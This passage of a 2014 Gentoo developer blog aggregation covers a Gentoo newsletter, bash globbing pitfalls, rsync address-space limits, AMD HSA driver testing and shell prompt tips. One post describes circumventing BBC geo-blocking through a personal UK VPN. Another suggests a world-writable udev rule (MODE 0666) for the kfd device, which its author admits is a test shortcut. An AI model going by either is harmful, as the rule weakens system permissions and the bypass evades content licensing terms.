Lastly, the service should clearly state when it may ask for user’s password and how to check the authenticity of the request. This can involve generic instructions involving TLS certificate and domain name checks. It may also include site-specific measures like user-specific images on login form.

Having a transparent security-related announcements policy and information page is a good idea as well. If a site provides more than one service (e.g. e-mail accounts), the website can list certificate fingerprints for the other services. Furthermore, any certificate or IP address changes can be preceded by a GPG-signed mail announcement.

September 13, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)
My first cover on a printed book (September 13, 2014, 14:03 UTC)

A few days ago I had the chance to first get my hands on a printed version of that book I designed the cover for: Einführung in die Mittelspieltaktik des Xiangqi by Rainer Schmidt. The design was done using Inkscape and xiangqi-setup. I helped out with a few things on the inside too.

A few links on the actual book:

PS: Please note the cover images are “all rights reserved”.

Gentoo Haskell Herd a.k.a. haskell (homepage, bugs)
ghc 7.8.3 and rare architectures (September 13, 2014, 09:03 UTC)

After some initially positive experience with ghc-7.8-rc1 I’ve decided to upstream most of the Gentoo fixes.

On rare arches ghc-7.8.3 behaves a bit badly:

  • ia64 build stopped being able to link itself after ghc-7.4 (gprel overflow)
  • on sparc, ia64 and ppc ghc was not able to create working shared libraries
  • integer-gmp library on ia64 crashed, and we had to use integer-simple

I have written a small story of those fixes here if you are curious.


To get ghc-7.8.3 working more smoothly on exotic arches you will need to backport at least the following patches:

Thank you!

September 08, 2014
Gentoo Monthly Newsletter: August 2014 (September 08, 2014, 21:20 UTC)

Gentoo News

Council News

Concerning the handling of bash-completion, and of phase functions in eclasses in general, the council decided to take no action. The former should be handled by the shell-tools team; the latter needs more discussion on the mailing lists.

Then we had two hot topics. The first was the games team policy; the council clarified that the games team in no way has authority over game ebuilds maintained by other developers. In addition, the games team should elect a lead in the near future; if it doesn't, it will be considered dysfunctional. Tim Harder (radhermit) acts as interim lead and organizes the elections.

Next, rumors about the handling of dynamic dependencies in Portage had sparked quite a stir. The council asks the Portage team, basically, not to remove dynamic dependency handling before they have worked out and presented a good plan for how Gentoo would work without it. Portage tree policies, and the handling of eclasses and virtuals in particular, need to be clarified.

Finally, the list of planned features for EAPI 6 was amended with two items, namely additional options for configure and a non-runtime-switchable ||= () or-dependency.

Gentoo Developer Moves


Gentoo is made up of 242 active developers, of which 43 are currently away.
Gentoo has recruited a total of 803 developers since its inception.


  • Ian Stakenvicius (axs) joined the multilib project
  • Michał Górny (mgorny) joined the QA team
  • Kristian Fiskerstrand (k_f) joined the Security team
  • Richard Freeman (rich0) joined the systemd team
  • Pavlos Ratis (dastergon) joined the Gentoo Infrastructure team
  • Patrice Clement (monsieur) and Ian Stakenvicius (axs) joined the perl team
  • Chris Reffett (creffett) joined the Wiki team
  • Pavlos Ratis (dastergon) left the KDE project
  • Dirkjan Ochtman (djc) left the ComRel project


This section summarizes the current state of the portage tree.

Architectures 45
Categories 162
Packages 17653
Ebuilds 37397
Architecture Stable Testing Total % of Packages
alpha 3661 574 4235 23.99%
amd64 10895 6263 17158 97.20%
amd64-fbsd 0 1573 1573 8.91%
arm 2692 1755 4447 25.19%
arm64 570 32 602 3.41%
hppa 3073 496 3569 20.22%
ia64 3196 626 3822 21.65%
m68k 614 98 712 4.03%
mips 0 2410 2410 13.65%
ppc 6841 2475 9316 52.77%
ppc64 4332 971 5303 30.04%
s390 1464 349 1813 10.27%
sh 1650 427 2077 11.77%
sparc 4135 922 5057 28.65%
sparc-fbsd 0 317 317 1.80%
x86 11572 5297 16869 95.56%
x86-fbsd 0 3241 3241 18.36%



The following GLSAs have been released by the Security Team:

GLSA Package Description Bug
201408-19 app-office/openoffice-bin (and 3 more) OpenOffice, LibreOffice: Multiple vulnerabilities 283370
201408-18 net-analyzer/nrpe NRPE: Multiple Vulnerabilities 397603
201408-17 app-emulation/qemu QEMU: Multiple vulnerabilities 486352
201408-16 www-client/chromium Chromium: Multiple vulnerabilities 504328
201408-15 dev-db/postgresql-server PostgreSQL: Multiple vulnerabilities 456080
201408-14 net-misc/stunnel stunnel: Information disclosure 503506
201408-13 dev-python/jinja Jinja2: Multiple vulnerabilities 497690
201408-12 www-servers/apache Apache HTTP Server: Multiple vulnerabilities 504990
201408-11 dev-lang/php PHP: Multiple vulnerabilities 459904
201408-10 dev-libs/libgcrypt Libgcrypt: Side-channel attack 519396
201408-09 dev-libs/libtasn1 GNU Libtasn1: Multiple vulnerabilities 511536
201408-08 sys-apps/file file: Denial of Service 505534
201408-07 media-libs/libmodplug ModPlug XMMS Plugin: Multiple vulnerabilities 480388
201408-06 media-libs/libpng libpng: Multiple vulnerabilities 503014
201408-05 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 519790
201408-04 dev-util/catfish Catfish: Multiple Vulnerabilities 502536
201408-03 net-libs/libssh LibSSH: Information disclosure 503504
201408-02 media-libs/freetype FreeType: Arbitrary code execution 504088
201408-01 dev-php/ZendFramework Zend Framework: SQL injection 369139

Package Removals/Additions


Removals

Package Developer Date
virtual/perl-Class-ISA dilfridge 02 Aug 2014
virtual/perl-Filter dilfridge 02 Aug 2014
dev-vcs/gitosis robbat2 04 Aug 2014
dev-vcs/gitosis-gentoo robbat2 04 Aug 2014
virtual/python-argparse mgorny 11 Aug 2014
virtual/python-unittest2 mgorny 11 Aug 2014
app-emacs/sawfish ulm 19 Aug 2014
virtual/ruby-test-unit graaff 20 Aug 2014
games-action/d2x mr_bones_ 25 Aug 2014
games-arcade/koules mr_bones_ 25 Aug 2014
dev-lang/libcilkrts ottxor 26 Aug 2014


Additions

Package Developer Date
dev-python/oslotest prometheanfire 01 Aug 2014
dev-db/tokumx chainsaw 01 Aug 2014
sys-boot/gummiboot mgorny 02 Aug 2014
app-admin/supernova alunduil 03 Aug 2014
dev-db/mysql-cluster robbat2 03 Aug 2014
net-libs/txtorcon mrueg 04 Aug 2014
dev-ruby/prawn-table mrueg 06 Aug 2014
sys-apps/cv zx2c4 06 Aug 2014
media-libs/openctm amynka 07 Aug 2014
sci-libs/levmar amynka 07 Aug 2014
media-gfx/printrun amynka 07 Aug 2014
dev-python/alabaster idella4 10 Aug 2014
dev-haskell/regex-pcre slyfox 11 Aug 2014
dev-python/gcs-oauth2-boto-plugin vapier 12 Aug 2014
dev-python/astropy-helpers jlec 12 Aug 2014
dev-perl/Math-ModInt chainsaw 13 Aug 2014
dev-ruby/classifier-reborn mrueg 13 Aug 2014
media-gfx/meshlab amynka 14 Aug 2014
dev-libs/librevenge scarabeus 15 Aug 2014
www-apps/jekyll-coffeescript mrueg 15 Aug 2014
www-apps/jekyll-gist mrueg 15 Aug 2014
www-apps/jekyll-paginate mrueg 15 Aug 2014
www-apps/jekyll-watch mrueg 15 Aug 2014
sec-policy/selinux-salt swift 15 Aug 2014
www-apps/jekyll-sass-converter mrueg 15 Aug 2014
dev-ruby/rouge mrueg 15 Aug 2014
dev-ruby/ruby-beautify graaff 16 Aug 2014
sys-firmware/nvidia-firmware idl0r 17 Aug 2014
media-libs/libmpris2client ssuominen 20 Aug 2014
xfce-extra/xfdashboard ssuominen 20 Aug 2014
www-client/opera-developer jer 20 Aug 2014
dev-libs/openspecfun patrick 21 Aug 2014
dev-libs/marisa dlan 22 Aug 2014
media-sound/dcaenc beandog 22 Aug 2014
sci-mathematics/geogebra amynka 23 Aug 2014
dev-python/crumbs alunduil 25 Aug 2014
media-gfx/kxstitch kensington 26 Aug 2014
media-gfx/symboleditor kensington 26 Aug 2014
dev-perl/Sort-Key chainsaw 26 Aug 2014
dev-perl/Sort-Key-IPv4 chainsaw 26 Aug 2014
sci-visualization/yt xarthisius 26 Aug 2014
dev-ruby/globalid graaff 27 Aug 2014
dev-python/certifi idella4 27 Aug 2014
www-apps/jekyll-sitemap mrueg 27 Aug 2014
sys-apps/tuned dlan 29 Aug 2014
app-portage/g-sorcery jauhien 29 Aug 2014
app-portage/gs-elpa jauhien 29 Aug 2014
app-portage/gs-pypi jauhien 29 Aug 2014
app-admin/eselect-rust jauhien 29 Aug 2014
sys-block/raid-check chutzpah 29 Aug 2014
dev-python/python3-openid maksbotan 30 Aug 2014
dev-python/python-social-auth maksbotan 30 Aug 2014
dev-python/websocket-client alunduil 31 Aug 2014
dev-ruby/ethon graaff 31 Aug 2014


The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.


The following tables and charts summarize the activity on Bugzilla between 01 August 2014 and 31 August 2014. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.

Bug Activity Number
New 1575
Closed 981
Not fixed 187
Duplicates 145
Total 6023
Blocker 5
Critical 19
Major 66

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period.

Rank Team/Developer Bug Count
1 Gentoo Security 102
2 Gentoo's Team for Core System packages 39
3 Gentoo KDE team 37
4 Default Assignee for Orphaned Packages 32
5 Julian Ospald (hasufell) 26
6 Gentoo Games 25
7 Portage team 25
8 Netmon Herd 24
9 Python Gentoo Team 23
10 Others 647


Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Linux bug wranglers 160
2 Gentoo Security 61
3 Default Assignee for Orphaned Packages 60
4 Gentoo KDE team 45
5 Gentoo's Team for Core System packages 45
6 Gentoo Linux Gnome Desktop Team 37
7 Gentoo Games 28
8 Portage team 28
9 Python Gentoo Team 26
10 Others 1084


Heard in the community

Send us your favorite Gentoo script or tip at

Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to

Comments or Suggestions?

Please head over to this forum post.

September 07, 2014
Jeremy Olexa a.k.a. darkside (homepage, bugs)
Bypassing Geolocation … (September 07, 2014, 00:42 UTC)

By now we all know that it is pretty easy to bypass geolocation blocking with a web proxy or VPN service. After all, there are over 2 million Google results for “bbc vpn” … and I wanted to do just that to view a BBC show on privacy and the dark web.

I wanted to set this up as cheaply as possible and not pay for a month of a service when I only needed one hour. This requirement directed me towards a do-it-yourself solution with an hourly server in the UK. I also wanted reproducibility, so that I could spin up a similar service again in the future.

My first attempt was to route my browser through a local SOCKS proxy via ssh tunneling: ssh -D 2001 user@uk-host.tld. That didn’t work because my home connection was not good enough to stream from BBC without incessant buffering.

Hmm, if this simple proxy won’t work, that strikes out many other ideas; I needed a way to use the BBC iPlayer Downloader to view content offline. Ok, but the software doesn’t have native proxy support (naturally). Maybe you could somehow use Tor and set the exit node to the UK, but that seems like a poor/slow idea.

I ended up routing all my traffic through a personal OpenVPN server in London, then downloaded the show via the BBC software and watched it in HD offline. The goal was to provision the VPN as quickly as possible (time is money). A Linode StackScript is a feature that Linode offers: a user-defined script run at first boot of your host. Surprisingly, no one had published one to install OpenVPN yet. So I did: “Debian 7.5 OpenVPN” – feel free to use it on the Linode service to boot up a VPN automatically. It takes about two minutes to boot, install, and configure OpenVPN this way. Then you download the ca.crt and client configuration from the newly provisioned server and import them into your client.

End result: it took 42 minutes to download a one-hour show. Since I shut down the VPN within an hour, I was charged the Linode minimum, $.015 USD. Though I recommend Linode (you can use my referral link if you want), this same concept applies to any provider with a presence in the UK, like Digital Ocean, which charges $.007/hour.

Addendum: even though I abandoned my first attempt, I left the browser window open, and it continued to download even after I was disconnected from my UK VPN. I guess BBC only checks your IP once and then hands you off to the Akamai CDN. Maybe you only need a VPN service for a few minutes?

I also donated money to a BBC-sponsored charity to offset some of my bandwidth usage and freeloading of a service that UK citizens have to pay for, and I encourage you to do the same. For reference, it costs a UK household about $.02 USD in tax per hour of BBC. (source)

September 05, 2014

Figure 1.1: Iron Penguin

Gentoo Linux is proud to announce the availability of a new LiveDVD to celebrate the continued collaboration between Gentoo users and developers. The LiveDVD features a superb list of packages, some of which are listed below.

A special thanks to the Gentoo Infrastructure Team and likewhoa. Their hard work behind the scenes provides the resources, services and technology necessary to support the Gentoo Linux project.

  • Packages included in this release: Linux Kernel 3.15.6, Xorg 1.16.0, KDE 4.13.3, Gnome 3.12.2, XFCE 4.10, Fluxbox 1.3.5, LXQT Desktop 0.7.0, i3 Desktop 2.8, Firefox 31.0, LibreOffice, Gimp 2.8.10-r1, Blender 2.71-r1, Amarok 2.8.0-r2, Chromium 37.0.2062.35 and much more ...
  • If you want to see if your package is included we have generated both the x86 package list and the amd64 package list. The FAQ is located at FAQ. DVD cases and covers for the 20140826 release are located at Artwork. Persistence mode is back in the 20140826 release!

The LiveDVD is available in two flavors: a hybrid x86/x86_64 version, and an x86_64 multilib version. The livedvd-x86-amd64-32ul-20140826 version will work on 32-bit x86 or 64-bit x86_64. If your CPU architecture is x86, then boot with the default gentoo kernel. If your arch is amd64, boot with the gentoo64 kernel. This means you can boot a 64-bit kernel and install a customized 64-bit userland while using the provided 32-bit userland. The livedvd-amd64-multilib-20140826 version is for x86_64 only.

If you are ready to check it out, let our bouncer direct you to the closest x86 image or amd64 image file.

If you need support or have any questions, please visit the discussion thread on our forum.

Thank you for your continued support,
Gentoo Linux Developers, the Gentoo Foundation, and the Gentoo-Ten Project.

Michał Górny a.k.a. mgorny (homepage, bugs)
Bash pitfalls: globbing everywhere! (September 05, 2014, 08:31 UTC)

Bash has many subtle pitfalls, some of which can live unnoticed for a very long time. A common example of this kind of pitfall is ubiquitous filename expansion, or globbing. What many script writers fail to notice is that practically anything that looks like a pattern and is not quoted is subject to globbing, including unquoted variables.

There are two extra snags that add to this. Firstly, many people forget that not only asterisks (*) and question marks (?) make up patterns — square brackets ([) do as well. Secondly, by default bash (and POSIX shell) takes failed expansions literally. That is, if your glob does not match any file, you may not even know that you are globbing.
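To make the bracket snag concrete, here is a minimal sketch (using a throwaway temporary directory) of an unquoted variable being expanded as a character-class pattern:

```shell
# A variable that merely *looks* like a pattern globs when unquoted.
tmp=$(mktemp -d)
cd "${tmp}"
touch foo1
v='foo[1]'
echo ${v}       # unquoted: [1] is a character class, so this matches foo1
echo "${v}"     # quoted: prints foo[1] literally
cd / && rm -rf "${tmp}"
```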

It's all just a matter of running in the proper directory for the result to change. Of course, it's often unlikely — maybe even close to impossible. You can work towards preventing that by running in a safe directory. But in the end, writing predictable software is a fine quality.

How to notice mistakes?

Bash provides two major facilities that can help you catch these mistakes: the shell options (shopt) nullglob and failglob.

The nullglob option is a good default choice for your script. After enabling it, failing filename expansions expand to nothing rather than the verbatim pattern itself. This has two important implications.

Firstly, it makes iterating over optional files easy:

for f in a/* b/* c/*; do
    some_magic "${f}"
done
Without nullglob, the above may actually return a/* if no file matches that pattern. For this reason, you would need an additional check for the existence of each file inside the loop. With nullglob, the unmatched arguments are simply omitted. In fact, if none of the patterns match, the loop won't run even once.
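The difference is easy to demonstrate against an empty directory (a throwaway one here):

```shell
# Contrast the default behaviour with nullglob on an unmatched pattern.
tmp=$(mktemp -d)

shopt -u nullglob
args=( "${tmp}"/* )
echo "default: ${#args[@]} element(s)"    # 1: the literal pattern survives

shopt -s nullglob
args=( "${tmp}"/* )
echo "nullglob: ${#args[@]} element(s)"   # 0: the unmatched glob vanishes

rmdir "${tmp}"
```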

Secondly, it turns every accidental glob into null. While this isn't the most friendly warning and in fact it may have very undesired results, you're more likely to notice that something is going wrong.

The failglob option is better if you can assume you don't need to match files in its scope. In this case, bash treats every failing filename expansion as a fatal error and terminates execution with an appropriate message.

The main advantage of failglob is that it makes you aware of any mistake before someone hits it the hard way, assuming of course that the pattern doesn't accidentally expand into something first.
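A quick sketch of failglob at work, with the failing expansion confined to a subshell so the surrounding script keeps running (the path is a hypothetical one assumed not to exist):

```shell
# failglob turns an unmatched pattern into an error instead of a literal.
if ! (shopt -s failglob; echo /surely/does/not/exist/*) 2>/dev/null; then
    echo "failglob rejected the unmatched pattern"
fi
```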

There is also a choice of noglob. However, I wouldn't recommend it since it works around mistakes rather than fixing them, and makes the code rely on a non-standard environment.

Word splitting without globbing

One of the pitfalls I myself noticed lately is attempting to use unquoted variable substitution to do word splitting. For example:

for i in ${v}; do
    echo "${i}"
done
At first glance, everything looks fine. ${v} contains a whitespace-separated list of words, and we iterate over each word. The pitfall here is that the words in ${v} are subject to filename expansion. For example, if a lone asterisk happens to be there (like v='10 * 4'), you'd actually get all files in the current directory. Unexpected, isn't it?

I am aware of three solutions that can be used to accomplish word splitting without implicit globbing:

  1. setting shopt -s noglob locally,
  2. setting GLOBIGNORE='*' locally,
  3. using the swiss army knife of read to perform word splitting.

Personally, I dislike the first two since they require set-and-restore magic, and the second also has the penalty of doing the globbing and then discarding the result. Therefore, I will expand on using read:

read -r -d '' -a words <<<"${v}"
for i in "${words[@]}"; do
    echo "${i}"
done

While read is normally used to read from files, we can use bash's here-string syntax to feed the variable into it. The -r option disables backslash-escape processing, which is undesired here. -d '' causes read to process the whole input rather than stop at the first delimiter (such as a newline). -a words puts the split words into the array ${words[@]} — and since we know how to safely iterate over an array, the underlying issue is solved.
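Putting it together with the v='10 * 4' example from above, the asterisk survives word splitting as a literal word instead of matching files:

```shell
# Word splitting via read: no filename expansion happens.
v='10 * 4'
read -r -d '' -a words <<<"${v}" || true  # read hits EOF before a NUL delimiter; ignore its status
for i in "${words[@]}"; do
    echo "${i}"
done
# prints 10, *, 4 (each on its own line), regardless of the current directory
```

Note the || true: with -d '', read returns non-zero at end of input, which matters under set -e.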

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
32bit Madness (September 05, 2014, 06:41 UTC)

This week I ran into a funny issue doing backups with rsync:

rsnapshot/weekly.3/server/storage/lost/of/subdirectories/some-stupid.file => rsnapshot/daily.0/server/storage/lost/of/subdirectories/some-stupid.file
ERROR: out of memory in make_file [generator]
rsync error: error allocating core memory buffers (code 22) at util.c(117) [generator=3.0.9]
rsync error: received SIGUSR1 (code 19) at main.c(1298) [receiver=3.0.9]
rsync: connection unexpectedly closed (2168136360 bytes received so far) [sender]
rsync error: error allocating core memory buffers (code 22) at io.c(605) [sender=3.0.9]
Oopsiedaisy, rsync ran out of memory. But ... this machine has 8GB RAM, plus 32GB Swap ?!
So I re-ran this and started observing, and BAM, it fails again. With ~4GB RAM free.

4GB you say, eh? That smells of ... 2^32 ...
For doing the copying I was using sysrescuecd, and then it became obvious to me: All binaries are of course 32bit!

So now I'm doing a horrible hack of "linux64 chroot /mnt/server" so that I have a 64bit environment that does not run out of space randomly. Plus 3 new bugs for the Gentoo livecd, which fails to appreciate USB and other things.
Who would have thought that a 16TB partition can make rsync stumble over address space limits ...

September 03, 2014
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
AMD HSA (September 03, 2014, 06:25 UTC)

With the release of the "Kaveri" APUs AMD has released some quite intriguing technology. The idea of the "APU" is a blend of CPU and GPU, what AMD calls "HSA" - Heterogeneous System Architecture.
What does this mean for us? In theory, once software catches up, it'll be a lot easier to use GPU-acceleration (e.g. OpenCL) within normal applications.

One big advantage seems to be that CPU and GPU share the system memory, so with the right drivers you should be able to do zero-copy GPU processing. No more host-to-GPU copy and other waste of time.

So far there hasn't been any driver support to take advantage of that. Here's the good news: As of a week or two ago there is driver support. Still very alpha, but ... at last, drivers!

On the kernel side there's the kfd driver, which piggybacks on radeon. It's available in a slightly very patched kernel from AMD. During bootup it looks like this:

[    1.651992] [drm] radeon kernel modesetting enabled.
[    1.657248] kfd kfd: Initialized module
[    1.657254] Found CRAT image with size=1440
[    1.657257] Parsing CRAT table with 1 nodes
[    1.657258] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657260] CU CPU: cores=4 id_base=16
[    1.657261] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657262] CU GPU: simds=32 id_base=-2147483648
[    1.657263] Found memory entry in CRAT table with proximity_domain=0
[    1.657264] Found memory entry in CRAT table with proximity_domain=0
[    1.657265] Found memory entry in CRAT table with proximity_domain=0
[    1.657266] Found memory entry in CRAT table with proximity_domain=0
[    1.657267] Found cache entry in CRAT table with processor_id=16
[    1.657268] Found cache entry in CRAT table with processor_id=16
[    1.657269] Found cache entry in CRAT table with processor_id=16
[    1.657270] Found cache entry in CRAT table with processor_id=17
[    1.657271] Found cache entry in CRAT table with processor_id=18
[    1.657272] Found cache entry in CRAT table with processor_id=18
[    1.657273] Found cache entry in CRAT table with processor_id=18
[    1.657274] Found cache entry in CRAT table with processor_id=19
[    1.657274] Found TLB entry in CRAT table (not processing)
[    1.657275] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657277] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657280] Found TLB entry in CRAT table (not processing)
[    1.657286] Creating topology SYSFS entries
[    1.657316] Finished initializing topology ret=0
[    1.663173] [drm] initializing kernel modesetting (KAVERI 0x1002:0x1313 0x1002:0x0123).
[    1.663204] [drm] register mmio base: 0xFEB00000
[    1.663206] [drm] register mmio size: 262144
[    1.663210] [drm] doorbell mmio base: 0xD0000000
[    1.663211] [drm] doorbell mmio size: 8388608
[    1.663280] ATOM BIOS: 113
[    1.663357] radeon 0000:00:01.0: VRAM: 1024M 0x0000000000000000 - 0x000000003FFFFFFF (1024M used)
[    1.663359] radeon 0000:00:01.0: GTT: 1024M 0x0000000040000000 - 0x000000007FFFFFFF
[    1.663360] [drm] Detected VRAM RAM=1024M, BAR=256M
[    1.663361] [drm] RAM width 128bits DDR
[    1.663471] [TTM] Zone  kernel: Available graphics memory: 7671900 kiB
[    1.663472] [TTM] Zone   dma32: Available graphics memory: 2097152 kiB
[    1.663473] [TTM] Initializing pool allocator
[    1.663477] [TTM] Initializing DMA pool allocator
[    1.663496] [drm] radeon: 1024M of VRAM memory ready
[    1.663497] [drm] radeon: 1024M of GTT memory ready.
[    1.663516] [drm] Loading KAVERI Microcode
[    1.667303] [drm] Internal thermal controller without fan control
[    1.668401] [drm] radeon: dpm initialized
[    1.669403] [drm] GART: num cpu pages 262144, num gpu pages 262144
[    1.685757] [drm] PCIE GART of 1024M enabled (table at 0x0000000000277000).
[    1.685894] radeon 0000:00:01.0: WB enabled
[    1.685905] radeon 0000:00:01.0: fence driver on ring 0 use gpu addr 0x0000000040000c00 and cpu addr 0xffff880429c5bc00
[    1.685908] radeon 0000:00:01.0: fence driver on ring 1 use gpu addr 0x0000000040000c04 and cpu addr 0xffff880429c5bc04
[    1.685910] radeon 0000:00:01.0: fence driver on ring 2 use gpu addr 0x0000000040000c08 and cpu addr 0xffff880429c5bc08
[    1.685912] radeon 0000:00:01.0: fence driver on ring 3 use gpu addr 0x0000000040000c0c and cpu addr 0xffff880429c5bc0c
[    1.685914] radeon 0000:00:01.0: fence driver on ring 4 use gpu addr 0x0000000040000c10 and cpu addr 0xffff880429c5bc10
[    1.686373] radeon 0000:00:01.0: fence driver on ring 5 use gpu addr 0x0000000000076c98 and cpu addr 0xffffc90012236c98
[    1.686375] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
[    1.686376] [drm] Driver supports precise vblank timestamp query.
[    1.686406] radeon 0000:00:01.0: irq 83 for MSI/MSI-X
[    1.686418] radeon 0000:00:01.0: radeon: using MSI.
[    1.686441] [drm] radeon: irq initialized.
[    1.689611] [drm] ring test on 0 succeeded in 3 usecs
[    1.689699] [drm] ring test on 1 succeeded in 2 usecs
[    1.689712] [drm] ring test on 2 succeeded in 2 usecs
[    1.689849] [drm] ring test on 3 succeeded in 2 usecs
[    1.689856] [drm] ring test on 4 succeeded in 2 usecs
[    1.711523] tsc: Refined TSC clocksource calibration: 3393.828 MHz
[    1.746010] [drm] ring test on 5 succeeded in 1 usecs
[    1.766115] [drm] UVD initialized successfully.
[    1.767829] [drm] ib test on ring 0 succeeded in 0 usecs
[    2.268252] [drm] ib test on ring 1 succeeded in 0 usecs
[    2.712891] Switched to clocksource tsc
[    2.768698] [drm] ib test on ring 2 succeeded in 0 usecs
[    2.768819] [drm] ib test on ring 3 succeeded in 0 usecs
[    2.768870] [drm] ib test on ring 4 succeeded in 0 usecs
[    2.791599] [drm] ib test on ring 5 succeeded
[    2.812675] [drm] Radeon Display Connectors
[    2.812677] [drm] Connector 0:
[    2.812679] [drm]   DVI-D-1
[    2.812680] [drm]   HPD3
[    2.812682] [drm]   DDC: 0x6550 0x6550 0x6554 0x6554 0x6558 0x6558 0x655c 0x655c
[    2.812683] [drm]   Encoders:
[    2.812684] [drm]     DFP2: INTERNAL_UNIPHY2
[    2.812685] [drm] Connector 1:
[    2.812686] [drm]   HDMI-A-1
[    2.812687] [drm]   HPD1
[    2.812688] [drm]   DDC: 0x6530 0x6530 0x6534 0x6534 0x6538 0x6538 0x653c 0x653c
[    2.812689] [drm]   Encoders:
[    2.812690] [drm]     DFP1: INTERNAL_UNIPHY
[    2.812691] [drm] Connector 2:
[    2.812692] [drm]   VGA-1
[    2.812693] [drm]   HPD2
[    2.812695] [drm]   DDC: 0x6540 0x6540 0x6544 0x6544 0x6548 0x6548 0x654c 0x654c
[    2.812695] [drm]   Encoders:
[    2.812696] [drm]     CRT1: INTERNAL_UNIPHY3
[    2.812697] [drm]     CRT1: NUTMEG
[    2.924144] [drm] fb mappable at 0xC1488000
[    2.924147] [drm] vram apper at 0xC0000000
[    2.924149] [drm] size 9216000
[    2.924150] [drm] fb depth is 24
[    2.924151] [drm]    pitch is 7680
[    2.924428] fbcon: radeondrmfb (fb0) is primary device
[    2.994293] Console: switching to colour frame buffer device 240x75
[    2.999979] radeon 0000:00:01.0: fb0: radeondrmfb frame buffer device
[    2.999981] radeon 0000:00:01.0: registered panic notifier
[    3.008270] ACPI Error: [\_SB_.ALIB] Namespace lookup failure, AE_NOT_FOUND (20131218/psargs-359)
[    3.008275] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATC0] (Node ffff88042f04f028), AE_NOT_FOUND (20131218/psparse-536)
[    3.008282] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATCS] (Node ffff88042f04f000), AE_NOT_FOUND (20131218/psparse-536)
[    3.509149] kfd: kernel_queue sync_with_hw timeout expired 500
[    3.509151] kfd: wptr: 8 rptr: 0
[    3.509243] kfd kfd: added device (1002:1313)
[    3.509248] [drm] Initialized radeon 2.37.0 20080528 for 0000:00:01.0 on minor 0
It is recommended to add udev rules:
# cat /etc/udev/rules.d/kfd.rules 
KERNEL=="kfd", MODE="0666"
(this might not be the best way to do it, but we're just here to test if things work at all ...)

AMD has provided a small shell script to test if things work:
# ./ 

Kaveri detected:............................Yes
Kaveri type supported:......................Yes
Radeon module is loaded:....................Yes
KFD module is loaded:.......................Yes
AMD IOMMU V2 module is loaded:..............Yes
KFD device exists:..........................Yes
KFD device has correct permissions:.........Yes
Valid GPU ID is detected:...................Yes

Can run HSA.................................YES
So that's a good start. Then you need some support libs ... which I've ebuildized in the most horrible ways.
These ebuilds can be found here.

Since there's at least one binary file with undeclared license and some other inconsistencies I cannot recommend installing these packages right now.
And of course I hope that AMD will release the sourcecode of these libraries ...

There's an example "vector_copy" program included; it mostly works, but appears to go into an infinite loop. Output looks like this:
# ./vector_copy 
Initializing the hsa runtime succeeded.
Calling hsa_iterate_agents succeeded.
Checking if the GPU device is non-zero succeeded.
Querying the device name succeeded.
The device name is Spectre.
Querying the device maximum queue size succeeded.
The maximum queue size is 131072.
Creating the queue succeeded.
Creating the brig module from vector_copy.brig succeeded.
Creating the hsa program succeeded.
Adding the brig module to the program succeeded.
Finding the symbol offset for the kernel succeeded.
Finalizing the program succeeded.
Querying the kernel descriptor address succeeded.
Creating a HSA signal succeeded.
Registering argument memory for input parameter succeeded.
Registering argument memory for output parameter succeeded.
Finding a kernarg memory region succeeded.
Allocating kernel argument memory buffer succeeded.
Registering the argument buffer succeeded.
Dispatching the kernel succeeded.
Big thanks to AMD for giving us geeks some new toys to work with, and I hope it becomes a reliable and efficient platform to do some epic numbercrunching :)

August 30, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Showing return code in PS1 (August 30, 2014, 23:14 UTC)

If you do daily management on Unix/Linux systems, then checking the return code of a command is something you’ll do often. If you do SELinux development, you might not even notice that a command has failed without checking its return code, as policies might prevent the application from showing any output.

To make sure I don’t miss out on application failures, I wanted to add the return code of the last executed command to my PS1 (i.e. the prompt displayed on my terminal).
I wasn’t able to add it to the prompt easily – in fact, I had to use a bash feature called the prompt command.

When the PROMPT_COMMAND variable is defined, bash will execute its content (which I declare as a function) to generate the prompt. Inside the function, I obtain the return code of the last command ($?) and then add it to the PS1 variable. This results in the following code snippet in my ~/.bashrc:

export PROMPT_COMMAND=__gen_ps1
function __gen_ps1() {
  local EXITCODE="$?";
  # Enable colors for ls, etc.  Prefer ~/.dir_colors #64489
  if type -P dircolors >/dev/null ; then
    if [[ -f ~/.dir_colors ]] ; then
      eval $(dircolors -b ~/.dir_colors)
    elif [[ -f /etc/DIR_COLORS ]] ; then
      eval $(dircolors -b /etc/DIR_COLORS)
    fi
  fi
  if [[ ${EUID} == 0 ]] ; then
    PS1="RC=${EXITCODE} \[\033[01;31m\]\h\[\033[01;34m\] \W \$\[\033[00m\] "
  else
    PS1="RC=${EXITCODE} \[\033[01;32m\]\u@\h\[\033[01;34m\] \w \$\[\033[00m\] "
  fi
}

With it, my prompt now nicely shows the return code of the last executed command. Neat.

Edit: Sean Patrick Santos showed me my utter failure in that this can be accomplished with the PS1 variable immediately, without using the overhead of the PROMPT_COMMAND. Just make sure to properly escape the $ sign which I of course forgot in my late-night experiments :-(.
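For reference, a PS1-only variant along those lines might look like this (a sketch; single quotes defer the expansion of $? until the prompt is rendered, assuming bash's default promptvars behavior):

```shell
# No PROMPT_COMMAND needed: $? stays literal in the PS1 value and is
# expanded anew each time bash draws the prompt.
PS1='RC=$? \u@\h \w \$ '
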